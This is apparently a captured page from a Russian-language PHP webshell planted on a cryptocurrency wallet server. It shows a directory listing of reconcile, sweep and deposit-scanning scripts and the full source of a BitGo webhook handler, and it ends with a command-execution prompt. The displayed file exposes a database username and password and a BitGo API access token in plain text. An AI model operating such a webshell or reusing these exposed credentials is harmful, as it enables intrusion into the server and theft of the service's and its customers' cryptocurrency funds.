PHP WebShell

• .. (вверх)
• [DIR] ..
• [FILE] bitgo_reconcile.log
• [FILE] confirm_checker_cron.php
• [DIR] logs
• [FILE] reconcile_bitgo_transfers.php
• [FILE] tron_scan_deposits.php
• [FILE] tron_sweep.php
• [FILE] update_coin_rates.php
• [FILE] update_online_rates.php
• [FILE] webhook_confirm.php

Просмотр файла: webhook_confirm.php

<?php
header("Content-Type: application/json");

$rawPayload = file_get_contents("php://input");
$data = json_decode($rawPayload, true);

$txid = $data['hash'] ?? null;
$coin = $data['coin'] ?? null;
$walletId = $data['wallet'] ?? null;
$eventType = $data['type'] ?? null;

if (!$txid || !$coin) {
    http_response_code(400);
    echo json_encode(['error' => 'Invalid payload']);
    exit;
}

$conn = new mysqli('localhost', 'bitcardo_wallet', 'Allowme@2050?', 'bitcardo_wallet');
if ($conn->connect_error) {
    http_response_code(500);
    echo json_encode(['error' => 'DB connection failed']);
    exit;
}

define('BITGO_API_BASE_URL', 'http://127.0.0.1:3080/api/v2');
define('BITGO_ACCESS_TOKEN', 'v2x198765d1835237bc0185b86b4833a8660d4bd02ab75b396f341276a184cf1e9d');

$url = BITGO_API_BASE_URL . "/$coin/tx/$txid";
$ch = curl_init($url);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HTTPHEADER => ["Authorization: Bearer " . BITGO_ACCESS_TOKEN]
]);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Default values if fetch fails
$confirmations = 0;
$status = 'unknown';

if ($httpCode === 200) {
    $txDetails = json_decode($response, true);
    $confirmations = $txDetails['confirmations'] ?? 0;
    $status = $txDetails['state'] ?? 'pending';

    $stmt = $conn->prepare("UPDATE transactions SET confirmation = ?, status = ?, updated_at = NOW() WHERE txid = ? AND coin = ?");
    $stmt->bind_param("isss", $confirmations, $status, $txid, $coin);
    $stmt->execute();
    $stmt->close();
}

// Log webhook
$stmtLog = $conn->prepare("
    INSERT INTO webhook_logs (event_type, coin, wallet_id, txid, status_code, response, raw_payload)
    VALUES (?, ?, ?, ?, ?, ?, ?)
");
$stmtLog->bind_param("ssssiss", $eventType, $coin, $walletId, $txid, $httpCode, $response, $rawPayload);
$stmtLog->execute();
$stmtLog->close();

$conn->close();

http_response_code(200);
echo json_encode(['success' => true]);

Выполнить команду